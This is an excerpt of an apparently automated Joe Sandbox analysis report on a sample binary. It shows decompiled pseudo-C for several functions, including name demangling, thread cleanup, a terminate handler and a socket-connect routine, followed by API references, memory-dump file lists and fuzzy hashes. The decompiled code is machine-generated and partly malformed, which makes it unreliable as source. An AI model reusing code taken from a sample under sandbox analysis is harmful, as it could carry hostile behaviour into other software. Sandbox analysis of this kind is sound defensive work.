Instruction ID: a41b7c460a24ac64f23146913b44c01de2d1fb22a8724b68d938b925d51e36d8
Opcode Fuzzy Hash: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
Instruction Fuzzy Hash: 79513AB5D046299BDB20DF69C8843DEBBF1AF49304F4481AAD448BB381D7395A898F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD20 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 296COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040FD56
free.MSVCRT ref: 0040FD65

Strings

h%, xrefs: 0040FD29, 0040FDD4, 0040FF32, 0040FF82
%, xrefs: 0040FED3, 00410054
`', xrefs: 0040FE20, 0040FE90, 0040FEC9, 00410084, 004100A2, 004100EB, 004101EF, 00410263

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: free
String ID: `'$h%$%
API String ID: 1294909896-1163342584
Opcode ID: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
Instruction ID: 2671b0a13e0022686a5f159adedc0d204adf9fcc5b257b9fc773f72bb2b13b5b
Opcode Fuzzy Hash: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
Instruction Fuzzy Hash: 7CD12BB0604306DFD720EF25D54435BBBE0AF80344F50883EE9859B361D7BD998ADB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FC Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040C6FC(void* __eax, signed char* __ebx, signed int __ecx, signed int __edx) {
				signed int _t81;
				signed int _t82;
				void* _t91;
				signed int _t94;
				signed char* _t99;
				signed int _t104;
				signed int _t116;
				int _t117;
				signed char* _t120;
				signed char* _t122;
				signed char* _t126;
				signed char* _t127;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int _t136;
				signed char* _t150;
				void* _t151;
				signed char* _t156;
				void* _t157;
				signed char** _t159;
				void* _t160;
				signed char** _t161;
				void* _t167;

				_t135 = __edx;
				_t120 = __ebx;
				if(__al == 0x24) {
					_t81 = __ebx[9] & 0x000000ff;
					_t3 = _t81 == 0x49;
					_t130 = __ecx & 0xffffff00 | _t3;
					if(_t3 == 0) {
						L3:
						_t151 = 0;
						if(_t120[0xa] == 0x5f) {
							_t151 = (_t130 << 0x1f >> 0x1f) + 3;
						}
					} else {
						_t151 = 0;
						if(_t81 == 0x44) {
							goto L3;
						}
					}
					L31:
				}
				 *_t159 = _t120;
				 *(_t157 - 0x184) = _t135;
				_t82 = strlen(??);
				 *(_t157 - 0x170) = _t120;
				 *(_t157 - 0x168) = 0x11;
				 *(_t157 - 0x164) = _t120;
				 *(_t157 - 0x15c) = 0;
				 *(_t157 - 0x150) = 0;
				_t131 = _t82;
				 *(_t157 - 0x16c) =  &(_t120[_t82]);
				 *((intOrPtr*)(_t157 - 0x158)) = _t131 + _t131;
				 *(_t157 - 0x14c) = _t131;
				 *(_t157 - 0x148) = 0;
				 *(_t157 - 0x144) = 0;
				 *(_t157 - 0x140) = 0;
				_t160 = _t159 - E0040DB20(0x00000012 + (_t131 + _t131 + _t131 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t91 = E0040DB20(0x00000012 + _t131 * 0x00000004 & 0xfffffff0);
				_t136 =  *(_t157 - 0x184);
				_t161 = _t160 - _t91;
				_t167 = _t151 - 1;
				 *((intOrPtr*)(_t157 - 0x160)) = _t160 + 0xc;
				 *(_t157 - 0x154) =  &(_t161[3]);
				if(_t167 == 0) {
					_t132 = 0;
					if(_t136 == 0x5f) {
						_t136 = _t120[1] & 0x000000ff;
						 *(_t157 - 0x164) =  &(_t120[1]);
						if(_t136 == 0x5a) {
							 *(_t157 - 0x164) =  &(_t120[2]);
							_t124 = _t157 - 0x170;
							_t132 = E00406810(_t157 - 0x170, 1);
							if(( *(_t157 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t156 =  *(_t157 - 0x164);
									_t136 =  *_t156 & 0x000000ff;
									if(_t136 != 0x2e) {
										goto L15;
									}
									_t104 = _t156[1] & 0x000000ff;
									_t77 = _t104 - 0x61; // -7
									if(_t77 <= 0x19 || _t104 == 0x5f || _t104 - 0x30 <= 9) {
										_t132 = E00405190(_t124, _t132);
										continue;
									} else {
										_t136 =  *_t156 & 0x000000ff;
									}
									goto L15;
								}
							} else {
								_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
							}
						}
					}
				} else {
					if(_t167 < 0 || _t151 > 3) {
						_t132 = E00405ED0(_t157 - 0x170);
						_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
					} else {
						_t150 =  &(_t120[0xb]);
						 *(_t157 - 0x164) = _t150;
						if(_t120[0xb] != 0x5f || _t120[0xc] != 0x5a) {
							 *_t161 = _t150;
							_t125 = _t157 - 0x170;
							_t134 = E00404FF0(_t157 - 0x170, strlen(??), _t150);
						} else {
							 *(_t157 - 0x164) =  &(_t120[0xd]);
							_t125 = _t157 - 0x170;
							_t134 = E00406810(_t157 - 0x170, 0);
						}
						 *_t161 = 0;
						_t116 = E00404F90(_t125, _t134, (0 | _t151 != 0x00000002) + 0x42);
						_t126 =  *(_t157 - 0x164);
						 *_t161 = _t126;
						 *(_t157 - 0x184) = _t116;
						_t117 = strlen(??);
						_t132 =  *(_t157 - 0x184);
						_t127 =  &(_t126[_t117]);
						 *(_t157 - 0x164) = _t127;
						_t136 =  *_t127 & 0x000000ff;
					}
				}
				L15:
				_t94 = 0;
				if(_t136 == 0 && _t132 != 0) {
					_t122 = _t157 - 0x13c;
					 *(_t157 - 0x3c) = 0;
					 *((char*)(_t157 - 0x38)) = 0;
					 *(_t157 - 0x2c) = 0;
					 *((intOrPtr*)(_t157 - 0x34)) =  *((intOrPtr*)(_t157 - 0x17c));
					 *(_t157 - 0x28) = 0;
					 *(_t157 - 0x20) = 0;
					 *(_t157 - 0x1c) = 0;
					 *(_t157 - 0x30) =  *(_t157 - 0x180);
					 *(_t157 - 0x24) = 0;
					E004079F0(_t122, _t132, 0x11);
					_t99 =  *(_t157 - 0x3c);
					 *_t161 = _t122;
					 *((char*)(_t157 + _t99 - 0x13c)) = 0;
					_t161[2] =  *(_t157 - 0x30);
					_t161[1] = _t99;
					 *((intOrPtr*)(_t157 - 0x34))();
					_t94 = 0 |  *(_t157 - 0x24) == 0x00000000;
				}
				return _t94;
				goto L31;
			}

0x0040c6fc
0x0040c6fc
0x0040c702
0x0040c5a0
0x0040c5a6
0x0040c5a6
0x0040c5a9
0x0040c5b1
0x0040c5b1
0x0040c5b7
0x0040c7e8
0x0040c7e8
0x0040c5ab
0x0040c5ab
0x0040c5af
0x00000000
0x00000000
0x0040c5af
0x00000000
0x0040c5a9
0x0040c5c0
0x0040c5c3
0x0040c5c9
0x0040c5ce
0x0040c5d4
0x0040c5de
0x0040c5e4
0x0040c5ee
0x0040c5f8
0x0040c5fd
0x0040c606
0x0040c619
0x0040c61f
0x0040c629
0x0040c633
0x0040c642
0x0040c652
0x0040c657
0x0040c65d
0x0040c65f
0x0040c666
0x0040c66c
0x0040c672
0x0040c725
0x0040c72a
0x0040c7f0
0x0040c7f7
0x0040c800
0x0040c80e
0x0040c814
0x0040c828
0x0040c82a
0x0040c84b
0x0040c84b
0x0040c851
0x0040c857
0x00000000
0x00000000
0x0040c85d
0x0040c861
0x0040c867
0x0040c849
0x00000000
0x0040c874
0x0040c874
0x0040c874
0x00000000
0x0040c867
0x0040c82c
0x0040c832
0x0040c832
0x0040c82a
0x0040c800
0x0040c678
0x0040c678
0x0040c7cb
0x0040c7d3
0x0040c687
0x0040c68b
0x0040c68e
0x0040c694
0x0040c6a0
0x0040c6a3
0x0040c6b9
0x0040c880
0x0040c885
0x0040c88b
0x0040c898
0x0040c898
0x0040c6c8
0x0040c6cf
0x0040c6d4
0x0040c6da
0x0040c6dd
0x0040c6e3
0x0040c6e8
0x0040c6ee
0x0040c6f0
0x0040c6f6
0x0040c6f6
0x0040c678
0x0040c730
0x0040c730
0x0040c734
0x0040c740
0x0040c74b
0x0040c752
0x0040c756
0x0040c75d
0x0040c766
0x0040c76d
0x0040c774
0x0040c77b
0x0040c780
0x0040c787
0x0040c78c
0x0040c792
0x0040c795
0x0040c79d
0x0040c7a1
0x0040c7a5
0x0040c7af
0x0040c7af
0x0040c7b9
0x00000000

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_, xrefs: 0040C687
Z__, xrefs: 0040C7B2
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_
API String ID: 39653677-4277869324
Opcode ID: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
Instruction ID: 8d7f502781d967d802a4aa3f964cc6313e810cf132c2305c106e04feedb735a0
Opcode Fuzzy Hash: 93bc87d4a599b898b9007435da9f4fbf58381ce8c7af0ba03057e7bca5c2660f
Instruction Fuzzy Hash: 13511875D04619CBDB20DF69C8843DEBBF0AF49304F0481AAD448BB381DB399A898F85

Uniqueness

Uniqueness Score: -1.00%

Function 00411F10 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F47
CloseHandle.KERNEL32 ref: 00411F74
_endthreadex.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,004122C1), ref: 00411F8B
longjmp.MSVCRT(?,?,?,?,?,?,?,?,004122C1), ref: 00411FA6
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,004122C1), ref: 00411FB7
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,004122C1), ref: 00411FE4
CloseHandle.KERNEL32 ref: 00411FFE

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
Instruction ID: 4e6f2f2bca7cf614c94cf5b6cd3d36f82834035e84155aea1445addecb616fae
Opcode Fuzzy Hash: 56178e2ac8600d964766aa628ca786a291f8a3ac5a68369e8f71b7c128b74622
Instruction Fuzzy Hash: C4313EB0204301DFD711AF65D98879A7FE4AF04348F45886EEA458F362D778D886CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0400A090 Relevance: 10.6, APIs: 7, Instructions: 85
networkCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
				signed char _v8;
				short _v12;
				signed char _v13;
				signed int _v20;
				intOrPtr _v32;
				short _v34;
				char _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t40;
				char* _t42;

				_push(6);
				_push(1);
				_push(2);
				L0400B210();
				_v20 = __eax;
				if(_v20 != 0xffffffff) {
					_v36 = 2;
					_push(_a8 & 0x0000ffff);
					L0400B20A();
					_v34 = 2;
					_push(_a4);
					L0400B204();
					_v12 = 2;
					if(_v12 == 0) {
						return 0xffffffffffffffff;
					}
					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
					_v8 = 0;
					_v13 = 0;
					_v40 = 0;
					while(_v40 < _a12) {
						_push(0x10);
						_t42 =  &_v36;
						_push(_t42);
						_push(_v20);
						L0400B1FE();
						if(_t42 != 0) {
							_v40 = _v40 + 1;
							continue;
						}
						_v13 = 1;
						break;
					}
					if((_v13 & 0x000000ff) != 0) {
						if(_a16 != 0) {
							_v44 = _a16;
							_push(4);
							_push( &_v44);
							_push(0x1005);
							_push(0xffff);
							_push(_v20);
							L0400B1F2();
							_push(4);
							_push( &_v44);
							_push(0x1006);
							_push(0xffff);
							_push(_v20);
							L0400B1F2();
						}
						return _v20;
					}
					_t40 = _v20;
					_push(_t40);
					L0400B1F8();
					return _t40 | 0xffffffff;
				}
				return _v20;
			}

0x0400a096
0x0400a098
0x0400a09a
0x0400a09c
0x0400a0a1
0x0400a0a8
0x0400a0b7
0x0400a0bf
0x0400a0c0
0x0400a0c5
0x0400a0cc
0x0400a0cd
0x0400a0d2
0x0400a0d9
0x00000000
0x0400a0ea
0x0400a0e5
0x0400a0f2
0x0400a0f9
0x0400a0fd
0x0400a10f
0x0400a117
0x0400a119
0x0400a11c
0x0400a120
0x0400a121
0x0400a128
0x0400a10c
0x00000000
0x0400a10c
0x0400a12a
0x00000000
0x0400a12a
0x0400a138
0x0400a14c
0x0400a151
0x0400a154
0x0400a159
0x0400a15a
0x0400a15f
0x0400a167
0x0400a168
0x0400a16d
0x0400a172
0x0400a173
0x0400a178
0x0400a180
0x0400a181
0x0400a181
0x00000000
0x0400a186
0x0400a13a
0x0400a13d
0x0400a13e
0x00000000
0x0400a143
0x00000000

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
htons.WS2_32(?), ref: 0400A0C0
gethostbyname.WS2_32(?), ref: 0400A0CD
connect.WS2_32(000000FF,?,00000010), ref: 0400A121
closesocket.WS2_32(000000FF), ref: 0400A13E

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: closesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 530611402-0
Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00415CC0 Relevance: 10.6, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
InterlockedExchangeAdd.KERNEL32 ref: 00415D2D
ReleaseSemaphore.KERNEL32 ref: 00415D50
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415D60
InterlockedExchangeAdd.KERNEL32 ref: 00415D82
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44), ref: 00415D8A

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$Leave$ExchangeInterlocked$EnterReleaseSemaphore
String ID:
API String ID: 3502810096-0
Opcode ID: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
Instruction ID: c4e03dc48a609bb18e9f28535bc8b230369afd8b821da037918bb7a69205c831
Opcode Fuzzy Hash: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
Instruction Fuzzy Hash: C1215175A04608CFDB00EFB8E88929EBBF0EB88351F00853AE955C3350E734A559CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00417690 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00417690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a20, intOrPtr _a32, char* _a36, intOrPtr _a40) {
				intOrPtr _t26;
				char* _t33;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				char** _t55;

				_t49 = _a40;
				_a20 = _a36;
				_t26 = _a32;
				if(_t26 == 0) {
					L6:
					_t49 = _t49 - 1;
					 *_t55 = _a20;
					if(_t49 != 0) {
						E00418140(_t47, _t52, _t53, _t54);
						_a32 = 0xffffffff;
						E004183F0(_t47, _t52, _t53, _t54);
					} else {
						_t33 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t47, _t52, _t53, _t54))) + 8))();
						_t51 = __imp___iob;
						_a8 = 0xb;
						_a4 = 1;
						 *_t55 = "  what():  ";
						_a32 = 2;
						_a20 = _t33;
						_t18 = _t51 + 0x40; // 0x76664640
						_a12 = _t18;
						fwrite(??, ??, ??, ??);
						_t49 = __imp___iob;
						_t20 = _t49 + 0x40; // 0x76664640
						_a4 = _t20;
						 *_t55 = _a20;
						fputs(??, ??);
						 *_t55 = 0xa;
						_a4 = __imp___iob + 0x40;
						fputc(??, ??);
						E004183F0(_t47, _t52, _t53, _t54);
					}
					L4:
					_a32 = 0xffffffff;
					abort();
					L5:
					E004183F0(_t47, _t52, _t53, _t54);
					_a32 = 0xffffffff;
					 *_t55 = _a20;
					E0040E810();
					goto L6;
				}
				if(_t26 == 1) {
					goto L5;
				}
				asm("ud2");
				_a8 = 0x2d;
				_a4 = 1;
				 *_t55 = "terminate called without an active exception\n";
				_a12 = __imp___iob + 0x40;
				_a32 = 0xffffffff;
				fwrite(??, ??, ??, ??);
				goto L4;
			}

0x00417694
0x00417698
0x0041769c
0x004176a2
0x00417701
0x00417705
0x00417708
0x0041770b
0x00417790
0x00417795
0x0041779d
0x0041770d
0x00417716
0x00417719
0x0041771f
0x00417727
0x0041772f
0x00417736
0x0041773e
0x00417742
0x00417745
0x00417749
0x0041774e
0x00417754
0x00417757
0x0041775f
0x00417762
0x0041776c
0x00417776
0x0041777a
0x0041777f
0x0041777f
0x004176db
0x004176db
0x004176e3
0x004176e8
0x004176e8
0x004176f1
0x004176f9
0x004176fc
0x00000000
0x004176fc
0x004176a7
0x00000000
0x00000000
0x004176a9
0x004176b0
0x004176b8
0x004176c0
0x004176ca
0x004176ce
0x004176d6
0x00000000

APIs

fwrite.MSVCRT ref: 004176D6
abort.MSVCRT ref: 004176E3
fwrite.MSVCRT ref: 00417749
fputs.MSVCRT ref: 00417762
fputc.MSVCRT ref: 0041777A

Strings

-, xrefs: 004176B0

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: fwrite$abortfputcfputs
String ID: -
API String ID: 631181824-2547889144
Opcode ID: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
Instruction ID: e34ec58ff9fcec24660ec2e7040b0e2af75343082bb94453d7ff8c69b4f5a42c
Opcode Fuzzy Hash: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
Instruction Fuzzy Hash: 4D21C9B55083428FD304EF6AC54564EBBE0FB88718F048E2EE4D497391D779D8858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7DC Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040C7DC(signed char* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t76;
				void* _t85;
				signed int _t88;
				signed char* _t93;
				signed int _t98;
				signed int _t110;
				int _t111;
				signed char* _t116;
				signed char* _t120;
				signed char* _t121;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t129;
				signed char* _t143;
				void* _t144;
				signed char* _t146;
				void* _t147;
				intOrPtr* _t149;
				void* _t150;
				signed char** _t151;
				void* _t154;

				 *_t149 = __ebx;
				 *(_t147 - 0x184) = __edx;
				_t76 = strlen(??);
				 *((intOrPtr*)(_t147 - 0x170)) = __ebx;
				 *(_t147 - 0x168) = 0x11;
				 *(_t147 - 0x164) = __ebx;
				 *(_t147 - 0x15c) = 0;
				 *(_t147 - 0x150) = 0;
				_t124 = _t76;
				 *((intOrPtr*)(_t147 - 0x16c)) = __ebx + _t76;
				 *((intOrPtr*)(_t147 - 0x158)) = _t124 + _t124;
				 *(_t147 - 0x14c) = _t124;
				 *(_t147 - 0x148) = 0;
				 *(_t147 - 0x144) = 0;
				 *(_t147 - 0x140) = 0;
				_t150 = _t149 - E0040DB20(0x00000012 + (_t124 + _t124 + _t124 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t85 = E0040DB20(0x00000012 + _t124 * 0x00000004 & 0xfffffff0);
				_t129 =  *(_t147 - 0x184);
				_t151 = _t150 - _t85;
				_t154 = _t144 - 1;
				 *((intOrPtr*)(_t147 - 0x160)) = _t150 + 0xc;
				 *(_t147 - 0x154) =  &(_t151[3]);
				if(_t154 == 0) {
					_t125 = 0;
					if(_t129 == 0x5f) {
						_t129 =  *(__ebx + 1) & 0x000000ff;
						 *(_t147 - 0x164) = __ebx + 1;
						if(_t129 == 0x5a) {
							 *(_t147 - 0x164) = __ebx + 2;
							_t118 = _t147 - 0x170;
							_t125 = E00406810(_t147 - 0x170, 1);
							if(( *(_t147 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t146 =  *(_t147 - 0x164);
									_t129 =  *_t146 & 0x000000ff;
									if(_t129 != 0x2e) {
										goto L9;
									}
									_t98 = _t146[1] & 0x000000ff;
									_t73 = _t98 - 0x61; // -7
									if(_t73 <= 0x19 || _t98 == 0x5f || _t98 - 0x30 <= 9) {
										_t125 = E00405190(_t118, _t125);
										continue;
									} else {
										_t129 =  *_t146 & 0x000000ff;
										goto L9;
									}
									goto L25;
								}
							} else {
								_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
							}
						}
						L25:
					}
				} else {
					if(_t154 < 0 || _t144 > 3) {
						_t125 = E00405ED0(_t147 - 0x170);
						_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
					} else {
						_t143 = __ebx + 0xb;
						 *(_t147 - 0x164) = _t143;
						if( *(__ebx + 0xb) != 0x5f ||  *((char*)(__ebx + 0xc)) != 0x5a) {
							 *_t151 = _t143;
							_t119 = _t147 - 0x170;
							_t127 = E00404FF0(_t147 - 0x170, strlen(??), _t143);
						} else {
							 *(_t147 - 0x164) = __ebx + 0xd;
							_t119 = _t147 - 0x170;
							_t127 = E00406810(_t147 - 0x170, 0);
						}
						 *_t151 = 0;
						_t110 = E00404F90(_t119, _t127, (0 | _t144 != 0x00000002) + 0x42);
						_t120 =  *(_t147 - 0x164);
						 *_t151 = _t120;
						 *(_t147 - 0x184) = _t110;
						_t111 = strlen(??);
						_t125 =  *(_t147 - 0x184);
						_t121 =  &(_t120[_t111]);
						 *(_t147 - 0x164) = _t121;
						_t129 =  *_t121 & 0x000000ff;
					}
				}
				L9:
				_t88 = 0;
				if(_t129 == 0 && _t125 != 0) {
					_t116 = _t147 - 0x13c;
					 *(_t147 - 0x3c) = 0;
					 *((char*)(_t147 - 0x38)) = 0;
					 *(_t147 - 0x2c) = 0;
					 *((intOrPtr*)(_t147 - 0x34)) =  *((intOrPtr*)(_t147 - 0x17c));
					 *(_t147 - 0x28) = 0;
					 *(_t147 - 0x20) = 0;
					 *(_t147 - 0x1c) = 0;
					 *(_t147 - 0x30) =  *(_t147 - 0x180);
					 *(_t147 - 0x24) = 0;
					E004079F0(_t116, _t125, 0x11);
					_t93 =  *(_t147 - 0x3c);
					 *_t151 = _t116;
					 *((char*)(_t147 + _t93 - 0x13c)) = 0;
					_t151[2] =  *(_t147 - 0x30);
					_t151[1] = _t93;
					 *((intOrPtr*)(_t147 - 0x34))();
					_t88 = 0 |  *(_t147 - 0x24) == 0x00000000;
				}
				return _t88;
				goto L25;
			}

0x0040c5c0
0x0040c5c3
0x0040c5c9
0x0040c5ce
0x0040c5d4
0x0040c5de
0x0040c5e4
0x0040c5ee
0x0040c5f8
0x0040c5fd
0x0040c606
0x0040c619
0x0040c61f
0x0040c629
0x0040c633
0x0040c642
0x0040c652
0x0040c657
0x0040c65d
0x0040c65f
0x0040c666
0x0040c66c
0x0040c672
0x0040c725
0x0040c72a
0x0040c7f0
0x0040c7f7
0x0040c800
0x0040c80e
0x0040c814
0x0040c828
0x0040c82a
0x0040c84b
0x0040c84b
0x0040c851
0x0040c857
0x00000000
0x00000000
0x0040c85d
0x0040c861
0x0040c867
0x0040c849
0x00000000
0x0040c874
0x0040c874
0x00000000
0x0040c874
0x00000000
0x0040c867
0x0040c82c
0x0040c832
0x0040c832
0x0040c82a
0x00000000
0x0040c800
0x0040c678
0x0040c678
0x0040c7cb
0x0040c7d3
0x0040c687
0x0040c68b
0x0040c68e
